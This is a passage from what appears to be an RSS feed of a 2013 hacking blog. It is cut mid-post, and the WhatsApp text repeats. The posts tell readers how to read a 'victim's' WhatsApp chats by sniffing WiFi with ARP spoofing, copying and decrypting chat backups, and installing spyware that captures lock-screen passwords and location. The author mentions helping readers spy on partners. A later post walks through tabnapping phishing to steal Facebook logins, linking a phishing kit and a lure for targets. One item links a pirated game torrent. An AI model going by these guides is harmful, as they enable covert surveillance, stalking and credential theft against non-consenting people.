2. Decrypting Conversations have your victim locked his whatsapp? or you want all his conversation on your PC. Generally for security reasons WhatsApp encrypt Conversation while taking backup in SD Card or Phone Memory.But i have found a tool on XDA that claims to decrypt all the whatsapp conversation down to your PC. If you have some access over his device you can also send files from Bluetooth to your device and later read all the conversations. This tool is called&amp;nbsp; WhatsApp Xtract&amp;nbsp;and for this all credits goes to ztedd Some general advice on how to backup Whatsapp and get the database file: Android - In Whatsapp go to settings - more - Backup Chats - Copy the folder "Whatsapp" on the SD card to your backup location (e.g., PC) - (ideally also) use the app Titanium Backup to backup the full whatsapp application together with its data, copy the backup from the folder "TitaniumBackup" on the SD card to your backup location (e.g., PC) - Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files "wa.db" and "msgstore.db" you will find inside the Titanium Backup archive "com.whatsapp-[Date]-[some digits].tar.gz", alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card. iPhone - use Itunes to create an&amp;nbsp;unencrypted&amp;nbsp;Backup - use an Iphone Backup Tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or Iphone Backup Extractor. Make sure to create an unencrypted backup with Itunes, as these tools can't handle encrypted backups. Another possibility are forensic tools like UFED Physical Analyzer.) Blackberry - sync your blackberry with desktop manager and then copy the messagestore.db file from SD - however, it seems that this file is encrypted? Currently we don't know how to get the unencrypted messagestore.db file - Blackberry not supported yet! Nokia &amp;nbsp;- not known yet - Nokia not supported yet!&amp;nbsp; For Further Detail about this Method you can move to&amp;nbsp; this Forum of XDA. &amp;nbsp; 3. Using Spywares&amp;nbsp; Using 3rd Party Spywares can be very useful for spying not only WhatsApp Conversation but also many things like, you can able to Track GPS Location, you can capture the lock screen passwords and they can be also used for monitoring Websites. there are many spywares in the market but i recommend is&amp;nbsp; BOSSPY. Because it's free :) or you can Spy configuring&amp;nbsp;BusyBox&amp;nbsp;and Steps to do that are&amp;nbsp;here. Some Misconceptions about WhatsApp hacking&amp;nbsp; after writing&amp;nbsp;"4 WhatsApp Tricks and Hacks [Android]" I have received a number of E-Mail Most of them were asking for help for hacking their partner's WhatsApp and I have replied them all. but lots of people were having misconceptions about whatsapp hacking so let me discuss over here. Hacking WhatsApp is Much Harder than Hacking Facebook and Twitter as Facebook and Twitter can be Hacked using Social Engeenering Techniques like Phising and many others when we compare to hack someones WhatsApp Account and Gain Full Access over his Account - It is nearly Impossible. There is no tool that can hack whatsapp and give you a full access over someone's whatsapp account. Yes, there are Lot's of Youtube Video's ,Websites Filled with "WhatsApp Hack Tool" which claim that they can but the reality is they can't.</itunes:subtitle><itunes:author>noreply@blogger.com (Anonymous)</itunes:author><itunes:summary>Seeing a keep interest of hacking WhatsApp of my visitors on " 4 whatsapp trick and hack[android] " Promoted me to indulge my contribution to this topic. After lot of Researching I came upon with 3 Whatsapp Hacks which Really Works, and in this article i will also clear some misconception on WhatsApp Hacking. &amp;nbsp; Let's Get Started&amp;nbsp; 1. WhatsApp Sniffer&amp;nbsp; WhatsAppSniffer is a tool for root&amp;nbsp;terminals&amp;nbsp;to read WhatsApp conversations of a WIFI network (Open, WEP, WPA/WPA2). It captures the conversations, pictures / videos and&amp;nbsp;coordinates&amp;nbsp;that aresent or&amp;nbsp;received&amp;nbsp;by an Android phone, iPhone or Nokia on the same WIFI network. It has not been tested with W indows Phone&amp;nbsp;terminals. It can't read the messages written or&amp;nbsp;received&amp;nbsp;by the BlackBerry's, as they use&amp;nbsp;their own&amp;nbsp;servers and not WhatsApp's. This application&amp;nbsp;is designed to demonstrate that the security of WhatsApp's&amp;nbsp;communications&amp;nbsp;is null. WhatsAppSniffer just use the TCPDump program which reads all the WIFI network packets and filters those which has origin or destination WhatsApp's servers. All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: "While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp .... ")&amp;nbsp; For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional). &amp;nbsp;Requirements A&amp;nbsp;Rooted Android Device. Your Victim Should Use Same Wi-Fi Through Which you are connected. WhatsAppSniffer Donate ★ root v1.03. This Trick is much similar to&amp;nbsp; Hack your Friend's Facebook Account 2. Decrypting Conversations have your victim locked his whatsapp? or you want all his conversation on your PC. Generally for security reasons WhatsApp encrypt Conversation while taking backup in SD Card or Phone Memory.But i have found a tool on XDA that claims to decrypt all the whatsapp conversation down to your PC. If you have some access over his device you can also send files from Bluetooth to your device and later read all the conversations. This tool is called&amp;nbsp; WhatsApp Xtract&amp;nbsp;and for this all credits goes to ztedd Some general advice on how to backup Whatsapp and get the database file: Android - In Whatsapp go to settings - more - Backup Chats - Copy the folder "Whatsapp" on the SD card to your backup location (e.g., PC) - (ideally also) use the app Titanium Backup to backup the full whatsapp application together with its data, copy the backup from the folder "TitaniumBackup" on the SD card to your backup location (e.g., PC) - Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files "wa.db" and "msgstore.db" you will find inside the Titanium Backup archive "com.whatsapp-[Date]-[some digits].tar.gz", alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card. iPhone - use Itunes to create an&amp;nbsp;unencrypted&amp;nbsp;Backup - use an Iphone Backup Tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or Iphone Backup Extractor. Make sure to create an unencrypted backup with Itunes, as these tools can't handle encrypted backups. Another possibility are forensic tools like UFED Physical Analyzer.) Blackberry - sync your blackberry with desktop manager and then copy the messagestore.db file from SD - however, it seems that this file is encrypted? Currently we don't know how to get the unencrypted messagestore.db file - Blackberry not supported yet! Nokia &amp;nbsp;- not known yet - Nokia not supported yet!&amp;nbsp; For Further Detail about this Method you can move to&amp;nbsp; this Forum of XDA. &amp;nbsp; 3. Using Spywares&amp;nbsp; Using 3rd Party Spywares can be very useful for spying not only WhatsApp Conversation but also many things like, you can able to Track GPS Location, you can capture the lock screen passwords and they can be also used for monitoring Websites. there are many spywares in the market but i recommend is&amp;nbsp; BOSSPY. Because it's free :) or you can Spy configuring&amp;nbsp;BusyBox&amp;nbsp;and Steps to do that are&amp;nbsp;here. Some Misconceptions about WhatsApp hacking&amp;nbsp; after writing&amp;nbsp;"4 WhatsApp Tricks and Hacks [Android]" I have received a number of E-Mail Most of them were asking for help for hacking their partner's WhatsApp and I have replied them all. but lots of people were having misconceptions about whatsapp hacking so let me discuss over here. Hacking WhatsApp is Much Harder than Hacking Facebook and Twitter as Facebook and Twitter can be Hacked using Social Engeenering Techniques like Phising and many others when we compare to hack someones WhatsApp Account and Gain Full Access over his Account - It is nearly Impossible. There is no tool that can hack whatsapp and give you a full access over someone's whatsapp account. Yes, there are Lot's of Youtube Video's ,Websites Filled with "WhatsApp Hack Tool" which claim that they can but the reality is they can't.</itunes:summary><itunes:keywords>Hacking</itunes:keywords></item><item><title>GTA Vice City PC Game </title><link>http://bambahacks.blogspot.com/2013/11/gta-vice-city-pc-game.html</link><category>PC Game</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 15 Nov 2013 02:08:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-2991791102375862915</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="background-color: #141414; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; margin: 0px -15px; padding: 0.6em 15px 0.5em; position: relative;"&gt;
&lt;b&gt;&lt;i&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span style="font-size: large;"&gt;GTA Vice City PC Game (Highly Compressed)&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;h2 style="background-color: #141414; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; margin: 0px -15px; padding: 0.6em 15px 0.5em; position: relative;"&gt;
&lt;i&gt;Friends Here I Giving You Gta Vice City&amp;nbsp;&lt;/i&gt;&lt;i&gt;For PC This Is Ripped Or Compressed Hope You Like It&amp;nbsp;&lt;/i&gt;&lt;/h2&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4zc9ZeZ8VpxZXSL4HJHYmvG4i0hr0IxWo_j-YNqs9wXN0XdclNrMKHR5Wg6x1ToCCRe3g0gPCM7E0QpXgzT4Sma8u-EFN-TmT-B9M3LIzJGKQXt0lJY4SZu1tvlMiF3A0xvdZ3GuidgnD/s1600/gta_vice_city_cover.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4zc9ZeZ8VpxZXSL4HJHYmvG4i0hr0IxWo_j-YNqs9wXN0XdclNrMKHR5Wg6x1ToCCRe3g0gPCM7E0QpXgzT4Sma8u-EFN-TmT-B9M3LIzJGKQXt0lJY4SZu1tvlMiF3A0xvdZ3GuidgnD/s320/gta_vice_city_cover.jpg" width="239" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;GTA Vice City is a sandbox-style action-adventure computer and video game designed by Rockstar North (formerly DMA Design) and published by Rockstar Games. It is the second 3D game in the Grand Theft Auto video game franchise and sixth original title overall. It debuted in North America on August 1, 2002 for the PlayStation 2 and was later ported to the Xbox, and Microsoft Windows in 2003. It was made available on Steam on January 4, 2008. Vice City was preceded by Grand Theft Auto III and followed by Grand Theft Auto: San Andreas.&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;Vice City draws much of its inspiration from 1980s American culture. Set in 1986 in Vice City, a fictional city modeled after Miami, the story revolves around Mafia hitman Tommy Vercetti, who was recently released from prison. After being involved in a drug deal gone wrong, Tommy seeks out those responsible while building a criminal empire and seizing power from other criminal organizations in the city. The game uses a tweaked version of the game engine used in Grand Theft Auto III and similarly presents a huge cityscape, fully populated with buildings, vehicles, and people. Like other games in the series, Vice City has elements from driving games and third-person shooters, and features "open-world" gameplay that gives the player more control over their playing experience.&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;Upon its release, Vice City became the best-selling video game of 2002. As of July 2006, Vice City was, in the American market, the best-selling PlayStation 2 game of all time. Vice City also appeared on Japanese magazine Famitsu's readers' list of the favorite 100 videogames of 2006, the only fully-Western title on the list. Following this success, Vice City saw releases in Europe, Australia and Japan, as well as a release for the PC. Rockstar Vienna also packaged the game with its predecessor, Grand Theft Auto III, and sold it as Grand Theft Auto: Double Pack for the Xbox. Vice City's setting is also revisited in Grand Theft Auto: Vice City Stories, which serves as a prequel to events in Vice City.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;i&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;Minimum System Requirements:&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;800 MHz Intel Pentium III or 800 MHz AMD Athlon or 1.2GHz Intel Celeron or 1.2 GHz AMD Duron processor&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;128 MB of RAM&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;8 speed CD / DVD drive&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;915 MB of free hard disk space&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;(+ 635 MB if video card does NOT support DirectX Texture Compression)&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;32 MB video card with DirectX 9.0 compatible drivers ("GeForce" or better)&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;Sound Card with DirectX 9.0 compatible drivers Keyboard &amp;amp; Mouse&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;Recommended System Requirements:&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;Intel Pentium IV or AMD Athlon XP processor 256(+) MB of RAM&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;16 speed CD / DVD drive&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;1.55 GB of free hard disk space&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;(+ 635 MB if video card does NOT support DirectX Texture Compression)&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;64(+) MB video card with DirectX 9.0 compatible drivers ("GeForce 3" / "Radeon 8500" or better with DirectX Texture Compression support)&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;DirectX 9.0 compatible sound card with surround sound&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;Gamepad (USB or Joystick Port)&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;Keyboard &amp;amp; Mouse&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i style="background-color: #141414; color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; line-height: 18px; outline: none;"&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;TO DOWNLOAD THIS GAME YOU HAVE TO INSTALL BIT TORRENT TO YOUR PC&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;DOWNLOAD LINK IS BELOW&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i style="background-color: #141414; color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; line-height: 18px; outline: none;"&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;&lt;a href="http://dl.torrentcrazy.com/d0d2773745059b2a56401fd3eea119df711c090e/gta.vice.city.pc..rar.torrent" target="_blank"&gt;Gta Vice City &lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4zc9ZeZ8VpxZXSL4HJHYmvG4i0hr0IxWo_j-YNqs9wXN0XdclNrMKHR5Wg6x1ToCCRe3g0gPCM7E0QpXgzT4Sma8u-EFN-TmT-B9M3LIzJGKQXt0lJY4SZu1tvlMiF3A0xvdZ3GuidgnD/s72-c/gta_vice_city_cover.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Hack FB account  via a Tabnapping</title><link>http://bambahacks.blogspot.com/2013/11/hack-fb-account-via-tabnapping.html</link><category>FB Hack</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 15 Nov 2013 02:04:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-3111569925725955197</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;HI this is&amp;nbsp; Prophet ...Today I tell you how can you hack facebook account with tabnpping..&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;&lt;span style="font-family: georgia,serif;"&gt;&lt;b&gt;Tab Napping&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: georgia,serif; font-size: small;"&gt;&amp;nbsp;Tabnapping is a new form  of phishing that is hitting the internet now. With the conventional  form of phishing, for example, you might receive an email that is  supposedly from your bank, and it might ask you to login and update or  confirm your account details, of course, there would be a link to your  banks website in the email for you to click, which would take you to a  page that looks identical to your real banks login page.&lt;/span&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br style="font-family: georgia,serif;" /&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="font-family: georgia,serif;"&gt;How does it works&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: georgia,serif; font-size: small;"&gt;Tab napping is more  sophisticated than the phishing scams we’ve seen so far, and it no  longer relies on persuading you to click on a dodgy link. Instead it  targets internet users who open lots of tabs on their browser at the  same time (for example, by pressing &lt;br /&gt;CTRL&amp;nbsp;+ T).&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br style="font-family: georgia,serif;" /&gt;&lt;span style="font-family: georgia,serif;"&gt;&amp;nbsp;if  you have multiple tabs open and you are reading the page on your  current active tab, any of the other inactive browser tabs could be  replaced with a fake web page that is set up to obtain your personal  data, the web page will look exactly the same as the page you opened in  the tab, you probably wont even even know it has been replaced with a  fake page.&lt;/span&gt;&lt;br style="font-family: georgia,serif;" /&gt;&lt;span style="font-family: georgia,serif;"&gt;fraudsters can actually detect  when a tab has been left inactive for a while, and spy on your browser  history to find out which websites you regularly visit, and therefore  which pages to fake.&lt;/span&gt;&lt;br style="font-family: georgia,serif;" /&gt;&lt;span style="font-family: georgia,serif;"&gt;This  may surprise you, but phishers and fraudsters in general can actually  detect when a tab has been left inactive for a period of time, which  means they can spy on your browsing history, this tells them which  websites and web pages you visit on a regularly basis, so they'll know  which bank you use and which email account you use, whatever you view,  they'll know about it, which means they'll know which fake pages to make  to replace the real pages in your inactive tabs, you've now left  yourself open to become a victim of tab napping&lt;b&gt;.&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: georgia,serif;"&gt;&lt;b&gt;Steps&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family: georgia,serif; font-size: small;"&gt;First of all you have a web hosting site and if&amp;nbsp; you don't have then you create a free web hosting site on&amp;nbsp;&lt;a href="http://www.000webhost.com/" target="_blank"&gt;000webhost&lt;/a&gt;&lt;b&gt; .&lt;/b&gt;&lt;/span&gt;&lt;span style="font-family: georgia,serif; font-size: small;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-family: georgia,serif; font-size: small;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;ul&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-family: georgia,serif; font-size: small;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;Now download the phishing and script here.&lt;a href="https://www.dropbox.com/s/zqqhhiz8q91ee2d/Prophet.rar" target="_blank"&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-family: georgia,serif; font-size: small;"&gt;Upload all the files and folders to your website.&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: georgia,serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;ul&gt;&lt;/ul&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: georgia,serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6o1aQ-0f-wDiNlHMTLZ72wPwZqdIMRdj_UnwPFyxe0rHHNeQaMiLRkJmUnaMdgABAOQyuXg94ckZvJqTxKGg2HyhDud_pXbjmCn0EjRNoTgvMyNGUdCgwkX348zkZijCye5c4h3JsSg3d/s1600/Screenshot_2013-11-15-15-12-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6o1aQ-0f-wDiNlHMTLZ72wPwZqdIMRdj_UnwPFyxe0rHHNeQaMiLRkJmUnaMdgABAOQyuXg94ckZvJqTxKGg2HyhDud_pXbjmCn0EjRNoTgvMyNGUdCgwkX348zkZijCye5c4h3JsSg3d/s1600/Screenshot_2013-11-15-15-12-54.png" height="320" width="192" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;The website contain a game and send your website address(your tab  napping website where you upload all the files) to your friend or anyone  else whose facebook account you want to hack and tell him/her that if  your are intelligent or smart or say anything else then play this game  and win it.&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;a 